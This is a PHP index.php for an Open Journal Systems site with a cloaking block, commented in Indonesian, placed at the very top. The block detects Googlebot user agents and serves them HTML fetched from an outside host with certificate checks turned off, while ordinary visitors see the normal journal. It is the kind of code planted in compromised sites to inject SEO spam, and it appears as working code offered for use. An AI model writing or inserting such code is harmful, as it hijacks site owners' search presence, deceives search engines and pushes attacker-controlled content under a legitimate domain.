<?php
// ========== CLOAKING SEDERHANA ==========
// Letak: PALING ATAS index.php

$ua = $_SERVER['HTTP_USER_AGENT'] ?? '';

// Deteksi Google bot
$is_bot = false;
$bots = ['Googlebot', 'Google-Inspection', 'Google-Site-Verification', 'Googlebot-Mobile'];

foreach($bots as $bot) {
    if(stripos($ua, $bot) !== false) {
        $is_bot = true;
        break;
    }
}

if($is_bot) {
    // Ambil konten landing
    $url = 'https://pessawat.site/icaica';
    
    // Pake curl
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    $html = curl_exec($ch);
    $http = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    // Kalo sukses, tampilin
    if($http == 200 && $html) {
        echo $html;
        exit;
    }
    
    // Kalo gagal, tampilin fallback
    echo "<h1>Website</h1><p>Content for Google</p>";
    exit;
}

// ========== OJS CODE ==========
require_once 'lib/pkp/lib/vendor/autoload.php';
define('BASE_SYS_DIR', dirname(INDEX_FILE_LOCATION));
chdir(BASE_SYS_DIR);
require_once './lib/pkp/includes/functions.php';
return new \APP\core\Application();
